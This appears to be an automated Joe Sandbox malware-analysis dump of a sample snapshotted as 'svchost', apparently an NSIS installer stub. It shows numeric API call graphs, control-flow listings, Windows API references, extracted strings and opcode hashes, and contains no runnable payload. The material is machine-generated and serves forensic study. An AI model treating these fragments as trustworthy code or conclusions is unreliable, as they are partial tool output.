2872 403507 2978 405fa0 lstrcpynA 2872->2978 3038 40558d CreateDirectoryA 2873->3038 3043 40560a CreateDirectoryA 2874->3043 2880 4035a0 SetCurrentDirectoryA 2881 4035ba 2880->2881 2882 4035af 2880->2882 3047 405fa0 lstrcpynA 2881->3047 3046 405fa0 lstrcpynA 2882->3046 2887 403606 CopyFileA 2892 4035c8 2887->2892 2888 40364e 2890 405d7f 36 API calls 2888->2890 2890->2845 2891 405fc2 17 API calls 2891->2892 2892->2888 2892->2891 2894 40363a CloseHandle 2892->2894 3048 405fc2 2892->3048 3065 405d7f MoveFileExA 2892->3065 3069 40563f CreateProcessA 2892->3069 2894->2892 2896 4062ec wsprintfA LoadLibraryExA 2895->2896 2896->2807 2899 406354 2898->2899 2900 40635e GetProcAddress 2898->2900 2901 4062ca 3 API calls 2899->2901 2902 40327f 2900->2902 2903 40635a 2901->2903 2902->2811 2903->2900 2903->2902 2904->2817 2905->2819 2907 405969 2906->2907 2908 403319 CharNextA 2907->2908 2909 40596f CharNextA 2907->2909 2908->2827 2909->2907 3075 40620a 2910->3075 2912 4031f1 2912->2825 2913 4031e7 2913->2912 3084 405938 lstrlenA CharPrevA 2913->3084 2916 40560a 2 API calls 2917 4031ff 2916->2917 3087 405b68 2917->3087 3091 405b39 GetFileAttributesA CreateFileA 2920->3091 2922 402da3 2923 402db3 2922->2923 3092 405fa0 lstrcpynA 2922->3092 2923->2835 2923->2839 2923->2843 2925 402dc9 3093 40597f lstrlenA 2925->3093 2929 402dda GetFileSize 2930 402ed6 2929->2930 2943 402df1 2929->2943 2931 402cff 6 API calls 2930->2931 2932 402edf 2931->2932 2932->2923 2934 402f0f GlobalAlloc 2932->2934 3112 4031c4 SetFilePointer 2932->3112 3113 4031c4 SetFilePointer 2934->3113 2936 402f42 2939 402cff 6 API calls 2936->2939 2938 402f2a 3114 402f9c 2938->3114 2949 402f49 2939->2949 2940 402ef8 2942 4031ae ReadFile 2940->2942 2945 402f03 2942->2945 2943->2923 2943->2930 2943->2936 2944 402ea9 2943->2944 3098 4031ae 2943->3098 2944->2943 3101 402cff 2944->3101 2945->2923 2945->2934 2947 402f36 2947->2923 2947->2947 2948 402f73 SetFilePointer 2947->2948 2948->2949 2949->2923 2951 40370c 2950->2951 2952 4036fe FindCloseChangeNotification 2950->2952 3154 403739 2951->3154 2952->2951 2960 4056d1 2957->2960 2958 40354a ExitProcess 2959 4056e5 MessageBoxIndirectA 2959->2958 2960->2958 2960->2959 2961->2823 3214 405fa0 lstrcpynA 2962->3214 2964 405a37 3215 4059d1 CharNextA CharNextA 2964->3215 2967 4034f8 2967->2835 2967->2865 2968 40620a 5 API calls 2969 405a4d 2968->2969 2969->2967 2975 405a60 2969->2975 2970 405a78 lstrlenA 2971 405a83 2970->2971 2970->2975 2972 405938 3 API calls 2971->2972 2974 405a88 GetFileAttributesA 2972->2974 2973 4062a3 2 API calls 2973->2975 2974->2967 2975->2967 2975->2970 2975->2973 2976 40597f 2 API calls 2975->2976 2976->2970 2977->2872 2978->2839 2980 406338 5 API calls 2979->2980 2981 4037e2 2980->2981 2982 4037e8 2981->2982 2983 4037fa 2981->2983 3221 405efe wsprintfA 2982->3221 3222 405e87 2983->3222 2987 403843 lstrcatA 2988 4037f8 2987->2988 3227 403a93 2988->3227 2989 405e87 3 API calls 2989->2987 2992 405a26 18 API calls 2993 403875 2992->2993 2994 4038fe 2993->2994 2996 405e87 3 API calls 2993->2996 2995 405a26 18 API calls 2994->2995 2997 403904 2995->2997 2998 4038a1 2996->2998 2999 403914 LoadImageA 2997->2999 3000 405fc2 17 API calls 2997->3000 2998->2994 3003 4038bd lstrlenA 2998->3003 3006 405963 CharNextA 2998->3006 3001 4039ba 2999->3001 3002 40393b RegisterClassA 2999->3002 3000->2999 3005 40140b 2 API calls 3001->3005 3004 403971 SystemParametersInfoA CreateWindowExA 3002->3004 3034 4039c4 3002->3034 3007 4038f1 3003->3007 3008 4038cb lstrcmpiA 3003->3008 3004->3001 3009 4039c0 3005->3009 3011 4038bb 3006->3011 3010 405938 3 API calls 3007->3010 3008->3007 3012 4038db GetFileAttributesA 3008->3012 3013 403a93 18 API calls 3009->3013 3009->3034 3014 4038f7 3010->3014 3011->3003 3015 4038e7 3012->3015 3016 4039d1 3013->3016 3235 405fa0 lstrcpynA 3014->3235 3015->3007 3018 40597f 2 API calls 3015->3018 3019 403a60 3016->3019 3020 4039dd ShowWindow 3016->3020 3018->3007 3236 405199 OleInitialize 3019->3236 3021 4062ca 3 API calls 3020->3021 3024 4039f5 3021->3024 3023 403a66 3025 403a82 3023->3025 3026 403a6a 3023->3026 3027 403a03 GetClassInfoA 3024->3027 3029 4062ca 3 API calls 3024->3029 3028 40140b 2 API calls 3025->3028 3032 40140b 2 API calls 3026->3032 3026->3034 3030 403a17 GetClassInfoA RegisterClassA 3027->3030 3031 403a2d DialogBoxParamA 3027->3031 3028->3034 3029->3027 3030->3031 3033 40140b 2 API calls 3031->3033 3032->3034 3033->3034 3034->2845 3036 406338 5 API calls 3035->3036 3037 403557 lstrcatA 3036->3037 3037->2866 3037->2867 3039 4055de GetLastError 3038->3039 3040 403599 3038->3040 3039->3040 3041 4055ed SetFileSecurityA 3039->3041 3040->2880 3041->3040 3042 405603 GetLastError 3041->3042 3042->3040 3044 40561a 3043->3044 3045 40561e GetLastError 3043->3045 3044->2880 3045->3044 3046->2881 3047->2892 3060 405fcf 3048->3060 3049 4061f1 3050 4035f9 DeleteFileA 3049->3050 3260 405fa0 lstrcpynA 3049->3260 3050->2887 3050->2892 3052 4061cb lstrlenA 3052->3060 3055 405fc2 10 API calls 3055->3052 3056 4060e7 GetSystemDirectoryA 3056->3060 3057 405e87 3 API calls 3057->3060 3058 4060fa GetWindowsDirectoryA 3058->3060 3059 40620a 5 API calls 3059->3060 3060->3049 3060->3052 3060->3055 3060->3056 3060->3057 3060->3058 3060->3059 3061 40612e SHGetSpecialFolderLocation 3060->3061 3062 405fc2 10 API calls 3060->3062 3063 406174 lstrcatA 3060->3063 3258 405efe wsprintfA 3060->3258 3259 405fa0 lstrcpynA 3060->3259 3061->3060 3064 406146 SHGetPathFromIDListA CoTaskMemFree 3061->3064 3062->3060 3063->3060 3064->3060 3066 405da0 3065->3066 3067 405d93 3065->3067 3066->2892 3261 405c0f 3067->3261 3070 405672 CloseHandle 3069->3070 3071 40567e 3069->3071 3070->3071 3071->2892 3073 401389 2 API calls 3072->3073 3074 401420 3073->3074 3074->2850 3081 406216 3075->3081 3076 40627e 3077 406282 CharPrevA 3076->3077 3080 40629d 3076->3080 3077->3076 3078 406273 CharNextA 3078->3076 3078->3081 3079 405963 CharNextA 3079->3081 3080->2913 3081->3076 3081->3078 3081->3079 3082 406261 CharNextA 3081->3082 3083 40626e CharNextA 3081->3083 3082->3081 3083->3078 3085 405952 lstrcatA 3084->3085 3086 4031f9 3084->3086 3085->3086 3086->2916 3088 405b73 GetTickCount GetTempFileNameA 3087->3088 3089 405ba0 3088->3089 3090 40320a 3088->3090 3089->3088 3089->3090 3090->2825 3091->2922 3092->2925 3094 40598c 3093->3094 3095 405991 CharPrevA 3094->3095 3096 402dcf 3094->3096 3095->3094 3095->3096 3097 405fa0 lstrcpynA 3096->3097 3097->2929 3134 405bb1 ReadFile 3098->3134 3102 402d20 3101->3102 3103 402d08 3101->3103 3104 402d30 GetTickCount 3102->3104 3105 402d28 3102->3105 3106 402d11 DestroyWindow 3103->3106 3107 402d18 3103->3107 3109 402d61 3104->3109 3110 402d3e CreateDialogParamA ShowWindow 3104->3110 3136 406374 3105->3136 3106->3107 3107->2944 3109->2944 3110->3109 3112->2940 3113->2938 3116 402fb2 3114->3116 3115 402fe0 3118 4031ae ReadFile 3115->3118 3116->3115 3140 4031c4 SetFilePointer 3116->3140 3119 402feb 3118->3119 3120 403147 3119->3120 3121 402ffd GetTickCount 3119->3121 3122 403131 3119->3122 3123 403189 3120->3123 3126 40314b 3120->3126 3121->3122 3130 40304c 3121->3130 3122->2947 3125 4031ae ReadFile 3123->3125 3124 4031ae ReadFile 3124->3130 3125->3122 3126->3122 3127 4031ae ReadFile 3126->3127 3128 405be0 WriteFile 3126->3128 3127->3126 3128->3126 3129 4030a2 GetTickCount 3129->3130 3130->3122 3130->3124 3130->3129 3131 4030c7 MulDiv wsprintfA 3130->3131 3152 405be0 WriteFile 3130->3152 3141 4050c7 3131->3141 3135 4031c1 3134->3135 3135->2943 3137 406391 PeekMessageA 3136->3137 3138 402d2e 3137->3138 3139 406387 DispatchMessageA 3137->3139 3138->2944 3139->3137 3140->3115 3142 4050e2 3141->3142 3151 405185 3141->3151 3143 4050ff lstrlenA 3142->3143 3144 405fc2 17 API calls 3142->3144 3145 405128 3143->3145 3146 40510d lstrlenA 3143->3146 3144->3143 3147 40513b 3145->3147 3148 40512e SetWindowTextA 3145->3148 3149 40511f lstrcatA 3146->3149 3146->3151 3150 405141 SendMessageA SendMessageA SendMessageA 3147->3150 3147->3151 3148->3147 3149->3145 3150->3151 3151->3130 3153 405bfe 3152->3153 3153->3130 3155 403747 3154->3155 3156 403711 3155->3156 3157 40374c FreeLibrary GlobalFree 3155->3157 3158 405768 3156->3158 3157->3156 3157->3157 3159 405a26 18 API calls 3158->3159 3160 405788 3159->3160 3161 405790 DeleteFileA 3160->3161 3162 4057a7 3160->3162 3167 40352b OleUninitialize 3161->3167 3163 4058df 3162->3163 3198 405fa0 lstrcpynA 3162->3198 3166 4058d5 3163->3166 3163->3167 3165 4057cd 3168 4057e0 3165->3168 3169 4057d3 lstrcatA 3165->3169 3166->3163 3208 4062a3 FindFirstFileA 3166->3208 3167->2847 3167->2848 3172 40597f 2 API calls 3168->3172 3171 4057e6 3169->3171 3174 4057f4 lstrcatA 3171->3174 3175 4057eb 3171->3175 3172->3171 3176 4057ff lstrlenA FindFirstFileA 3174->3176 3175->3174 3175->3176 3176->3166 3196 405823 3176->3196 3177 405938 3 API calls 3178 405903 3177->3178 3180 405720 5 API calls 3178->3180 3179 405963 CharNextA 3179->3196 3181 40590f 3180->3181 3182 405913 3181->3182 3183 405929 3181->3183 3182->3167 3188 4050c7 24 API calls 3182->3188 3184 4050c7 24 API calls 3183->3184 3184->3167 3185 4058b4 FindNextFileA 3187 4058cc FindClose 3185->3187 3185->3196 3187->3166 3189 405920 3188->3189 3190 405d7f 36 API calls 3189->3190 3193 405927 3190->3193 3192 405768 60 API calls 3192->3196 3193->3167 3194 4050c7 24 API calls 3194->3185 3195 4050c7 24 API calls 3195->3196 3196->3179 3196->3185 3196->3192 3196->3194 3196->3195 3197 405d7f 36 API calls 3196->3197 3199 405fa0 lstrcpynA 3196->3199 3200 405720 3196->3200 3197->3196 3198->3165 3199->3196 3211 405b14 GetFileAttributesA 3200->3211 3203 405743 DeleteFileA 3206 405749 3203->3206 3204 40573b RemoveDirectoryA 3204->3206 3205 40574d 3205->3196 3206->3205 3207 405759 SetFileAttributesA 3206->3207 3207->3205 3209 4058f9 3208->3209 3210 4062b9 FindClose 3208->3210 3209->3167 3209->3177 3210->3209 3212 40572c 3211->3212 3213 405b26 SetFileAttributesA 3211->3213 3212->3203 3212->3204 3212->3205 3213->3212 3214->2964 3216 4059ec 3215->3216 3220 4059fc 3215->3220 3218 4059f7 CharNextA 3216->3218 3216->3220 3217 405a1c 3217->2967 3217->2968 3218->3217 3219 405963 CharNextA 3219->3220 3220->3217 3220->3219 3221->2988 3243 405e26 3222->3243 3225 405ebb RegQueryValueExA RegCloseKey 3226 403825 3225->3226 3226->2987 3226->2989 3228 403aa7 3227->3228 3247 405efe wsprintfA 3228->3247 3230 403b18 3248 403b4c 3230->3248 3232 403853 3232->2992 3233 403b1d 3233->3232 3234 405fc2 17 API calls 3233->3234 3234->3233 3235->2994 3251 40408b 3236->3251 3238 40408b SendMessageA 3240 4051f5 OleUninitialize 3238->3240 3239 4051bc 3242 4051e3 3239->3242 3254 401389 3239->3254 3240->3023 3242->3238 3244 405e35 3243->3244 3245 405e3e RegOpenKeyExA 3244->3245 3246 405e39 3244->3246 3245->3246 3246->3225 3246->3226 3247->3230 3249 405fc2 17 API calls 3248->3249 3250 403b5a SetWindowTextA 3249->3250 3250->3233 3252 4040a3 3251->3252 3253 404094 SendMessageA 3251->3253 3252->3239 3253->3252 3256 401390 3254->3256 3255 4013fe 3255->3239 3256->3255 3257 4013cb MulDiv SendMessageA 3256->3257 3257->3256 3258->3060 3259->3060 3260->3050 3262 405c35 3261->3262 3263 405c5b GetShortPathNameA 3261->3263 3288 405b39 GetFileAttributesA CreateFileA 3262->3288 3265 405c70 3263->3265 3266 405d7a 3263->3266 3265->3266 3268 405c78 wsprintfA 3265->3268 3266->3066 3267 405c3f CloseHandle GetShortPathNameA 3267->3266 3269 405c53 3267->3269 3270 405fc2 17 API calls 3268->3270 3269->3263 3269->3266 3271 405ca0 3270->3271 3289 405b39 GetFileAttributesA CreateFileA 3271->3289 3273 405cad 3273->3266 3274 405cbc GetFileSize GlobalAlloc 3273->3274 3275 405d73 CloseHandle 3274->3275 3276 405cde 3274->3276 3275->3266 3277 405bb1 ReadFile 3276->3277 3278 405ce6 3277->3278 3278->3275 3290 405a9e lstrlenA 3278->3290 3281 405d11 3283 405a9e 4 API calls 3281->3283 3282 405cfd lstrcpyA 3284 405d1f 3282->3284 3283->3284 3285 405d56 SetFilePointer 3284->3285 3286 405be0 WriteFile 3285->3286 3287 405d6c GlobalFree 3286->3287 3287->3275 3288->3267 3289->3273 3291 405adf lstrlenA 3290->3291 3292 405ae7 3291->3292 3293 405ab8 lstrcmpiA 3291->3293 3292->3281 3292->3282 3293->3292 3294 405ad6 CharNextA 3293->3294 3294->3291 4041 40378c 4042 403797 4041->4042 4043 40379b 4042->4043 4044 40379e GlobalAlloc 4042->4044 4044->4043 4045 401490 4046 4050c7 24 API calls 4045->4046 4047 401497 4046->4047 4048 401d9b GetDC 4049 402aa9 17 API calls 4048->4049 4050 401dad GetDeviceCaps MulDiv ReleaseDC 4049->4050 4051 402aa9 17 API calls 4050->4051 4052 401dde 4051->4052 4053 405fc2 17 API calls 4052->4053 4054 401e1b CreateFontIndirectA 4053->4054 4055 40257d 4054->4055 4056 40149d 4057 4022e7 4056->4057 4058 4014ab PostQuitMessage 4056->4058 4058->4057 4059 40159d 4060 402acb 17 API calls 4059->4060 4061 4015a4 SetFileAttributesA 4060->4061 4062 4015b6 4061->4062 4063 401a1e 4064 402acb 17 API calls 4063->4064 4065 401a27 ExpandEnvironmentStringsA 4064->4065 4066 401a3b 4065->4066 4068 401a4e 4065->4068 4067 401a40 lstrcmpA 4066->4067 4066->4068 4067->4068 4074 40171f 4075 402acb 17 API calls 4074->4075 4076 401726 SearchPathA 4075->4076 4077 401741 4076->4077 4078 401d20 4079 402aa9 17 API calls 4078->4079 4080 401d2e SetWindowLongA 4079->4080 4081 402957 4080->4081 4082 404822 4083 404832 4082->4083 4084 40484e 4082->4084 4093 4056a0 GetDlgItemTextA 4083->4093 4086 404881 4084->4086 4087 404854 SHGetPathFromIDListA 4084->4087 4089 404864 4087->4089 4092 40486b SendMessageA 4087->4092 4088 40483f SendMessageA 4088->4084 4090 40140b 2 API calls 4089->4090 4090->4092 4092->4086 4093->4088 4094 4041aa 4095 4041c0 4094->4095 4102 4042cc 4094->4102 4098 40403f 18 API calls 4095->4098 4096 40433b 4097 404405 4096->4097 4099 404345 GetDlgItem 4096->4099 4104 4040a6 8 API calls 4097->4104 4103 404216 4098->4103 4100 4043c3 4099->4100 4101 40435b 4099->4101 4100->4097 4109 4043d5 4100->4109 4101->4100 4108 404381 SendMessageA LoadCursorA SetCursor 4101->4108 4102->4096 4102->4097 4105 404310 GetDlgItem SendMessageA 4102->4105 4106 40403f 18 API calls 4103->4106 4107 404400 4104->4107 4127 404061 EnableWindow 4105->4127 4111 404223 CheckDlgButton 4106->4111 4128 40444e 4108->4128 4114 4043db SendMessageA 4109->4114 4115 4043ec 4109->4115 4125 404061 EnableWindow 4111->4125 4114->4115 4115->4107 4119 4043f2 SendMessageA 4115->4119 4116 404336 4120 40442a SendMessageA 4116->4120 4117 404241 GetDlgItem 4126 404074 SendMessageA 4117->4126 4119->4107 4120->4096 4122 404257 SendMessageA 4123 404275 GetSysColor 4122->4123 4124 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4122->4124 4123->4124 4124->4107 4125->4117 4126->4122 4127->4116 4131 405682 ShellExecuteExA 4128->4131 4130 4043b4 LoadCursorA SetCursor 4130->4100 4131->4130 4132 401e2b 4133 402aa9 17 API calls 4132->4133 4134 401e31 4133->4134 4135 402aa9 17 API calls 4134->4135 4136 401e3d 4135->4136 4137 401e54 EnableWindow 4136->4137 4138 401e49 ShowWindow 4136->4138 4139 402957 4137->4139 4138->4139 4140 4063ad WaitForSingleObject 4141 4063c7 4140->4141 4142 4063d9 GetExitCodeProcess 4141->4142 4143 406374 2 API calls 4141->4143 4144 4063ce WaitForSingleObject 4143->4144 4144->4141 4145 401f31 4146 402acb 17 API calls 4145->4146 4147 401f38 4146->4147 4148 4062a3 2 API calls 4147->4148 4149 401f3e 4148->4149 4150 401f50 4149->4150 4152 405efe wsprintfA 4149->4152 4152->4150 4159 402932 SendMessageA 4160 402957 4159->4160 4161 40294c InvalidateRect 4159->4161 4161->4160 4162 4014b7 4163 4014bd 4162->4163 4164 401389 2 API calls 4163->4164 4165 4014c5 4164->4165 4166 4026ba 4167 4026c0 4166->4167 4168 402957 4167->4168 4169 4026c8 FindClose 4167->4169 4169->4168 4170 40503b 4171 40504b 4170->4171 4172 40505f 4170->4172 4173 405051 4171->4173 4182 4050a8 4171->4182 4174 405067 IsWindowVisible 4172->4174 4178 40507e 4172->4178 4176 40408b SendMessageA 4173->4176 4177 405074 4174->4177 4174->4182 4175 4050ad CallWindowProcA 4179 40505b 4175->4179 4176->4179 4180 404992 5 API calls 4177->4180 4178->4175 4181 404a12 4 API calls 4178->4181 4180->4178 4181->4182 4182->4175 4183 4015bb 4184 402acb 17 API calls 4183->4184 4185 4015c2 4184->4185 4186 4059d1 4 API calls 4185->4186 4198 4015ca 4186->4198 4187 401624 4189 401629 4187->4189 4191 401652 4187->4191 4188 405963 CharNextA 4188->4198 4190 401423 24 API calls 4189->4190 4193 401630 4190->4193 4192 401423 24 API calls 4191->4192 4200 40164a 4192->4200 4202 405fa0 lstrcpynA 4193->4202 4195 40560a 2 API calls 4195->4198 4196 405627 5 API calls 4196->4198 4197 40163b SetCurrentDirectoryA 4197->4200 4198->4187 4198->4188 4198->4195 4198->4196 4199 40160c GetFileAttributesA 4198->4199 4201 40558d 4 API calls 4198->4201 4199->4198 4201->4198 4202->4197 4203 4016bb 4204 402acb 17 API calls 4203->4204 4205 4016c1 GetFullPathNameA 4204->4205 4206 4016f9 4205->4206 4207 4016d8 4205->4207 4208 402957 4206->4208 4209 40170d GetShortPathNameA 4206->4209 4207->4206 4210 4062a3 2 API calls 4207->4210 4209->4208 4211 4016e9 4210->4211 4211->4206 4213 405fa0 lstrcpynA 4211->4213 4213->4206 4214 40273c 4215 402acb 17 API calls 4214->4215 4217 40274a 4215->4217 4216 402760 4218 405b14 2 API calls 4216->4218 4217->4216 4219 402acb 17 API calls 4217->4219 4220 402766 4218->4220 4219->4216 4242 405b39 GetFileAttributesA CreateFileA 4220->4242 4222 402773 4223 40281c 4222->4223 4224 40277f GlobalAlloc 4222->4224 4227 402824 DeleteFileA 4223->4227 4228 402837 4223->4228 4225 402813 CloseHandle 4224->4225 4226 402798 4224->4226 4225->4223 4243 4031c4 SetFilePointer 4226->4243 4227->4228 4230 40279e 4231 4031ae ReadFile 4230->4231 4232 4027a7 GlobalAlloc 4231->4232 4233 4027f1 4232->4233 4234 4027b7 4232->4234 4235 405be0 WriteFile 4233->4235 4236 402f9c 31 API calls 4234->4236 4237 4027fd GlobalFree 4235->4237 4241 4027c4 4236->4241 4238 402f9c 31 API calls 4237->4238 4240 402810 4238->4240 4239 4027e8 GlobalFree 4239->4233 4240->4225 4241->4239 4242->4222 4243->4230 4244 401b3f 4245 402acb 17 API calls 4244->4245 4246 401b46 4245->4246 4247 402aa9 17 API calls 4246->4247 4248 401b4f wsprintfA 4247->4248 4249 402957 4248->4249

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 7 403257 1->7 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 7->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403487 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 53 4033e8 37->53 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 61 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->61 54 40348c-403492 44->54 47->42 47->48 48->42 55 4033a0-4033a2 49->55 56 4033a4 49->56 50->37 52 4033f5-403401 call 405fa0 50->52 52->33 53->28 58 403526-403536 call 4036f4 OleUninitialize 54->58 59 403498-40349e 54->59 55->50 55->56 56->50 72 40365a-403660 58->72 73 40353c-40354c call 4056bc ExitProcess 58->73 63 4034a0-4034ab call 405963 59->63 64 403516-403522 call 4037ce 59->64 61->44 61->58 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 64->58 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 79 4036ad-4036bb call 406338 74->79 80 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4036e6 75->82 83 4036ea-4036ee ExitProcess 75->83 84 403552-403566 call 405627 lstrcatA 76->84 85 4034ed-4034fa call 405a26 76->85 81 4034d8-4034da 77->81 97 4036c9-4036d3 ExitWindowsEx 79->97 98 4036bd-4036c7 79->98 80->79 81->76 88 4034dc-4034df 81->88 82->83 95 403573-40358d lstrcatA lstrcmpiA 84->95 96 403568-40356e lstrcatA 84->96 85->58 94 4034fc-403512 call 405fa0 * 2 85->94 88->76 88->81 94->64 95->58 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403638 call 405d7f call 405fc2 call 40563f 122->123 123->121 133 40363a-403641 CloseHandle 123->133 124->58 133->121
                              APIs
                              • SetErrorMode.KERNELBASE ref: 00403231
                              • GetVersion.KERNEL32 ref: 00403237
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                              • OleInitialize.OLE32(00000000), ref: 004032AD
                              • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                              • GetCommandLineA.KERNEL32(0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                              • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 0040331A
                              • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                              • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                              • lstrcatA.KERNEL32(00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                              • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                              • lstrcatA.KERNEL32(00436400,Low,?,00000006,00000008,0000000A), ref: 00403450
                              • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000006,00000008,0000000A), ref: 00403461
                              • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000006,00000008,0000000A), ref: 00403469
                              • DeleteFileA.KERNELBASE(00436000,?,00000006,00000008,0000000A), ref: 0040347D
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                • Part of subcall function 004037CE: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410), ref: 004038BE
                                • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
                                • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403925
                                • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                • Part of subcall function 004036F4: FindCloseChangeNotification.KERNELBASE(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                              • ExitProcess.KERNEL32 ref: 0040354C
                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                              • ExitProcess.KERNEL32 ref: 004036EE
                                • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Process$ExitFile$EnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesChangeCharClassCloseCommandCurrentDeleteDirectoryErrorFindHandleImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextNotificationOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                              • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 3490464366-3941163293
                              • Opcode ID: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                              • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                              • Opcode Fuzzy Hash: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                              • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 4062ca-4062ea GetSystemDirectoryA 135 4062ec 134->135 136 4062ee-4062f0 134->136 135->136 137 406300-406302 136->137 138 4062f2-4062fa 136->138 140 406303-406335 wsprintfA LoadLibraryExA 137->140 138->137 139 4062fc-4062fe 138->139 139->140
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                              • wsprintfA.USER32 ref: 0040631A
                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                              • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 141 405b68-405b72 142 405b73-405b9e GetTickCount GetTempFileNameA 141->142 143 405ba0-405ba2 142->143 144 405bad-405baf 142->144 143->142 145 405ba4 143->145 146 405ba7-405baa 144->146 145->146
                              APIs
                              • GetTickCount.KERNEL32 ref: 00405B7C
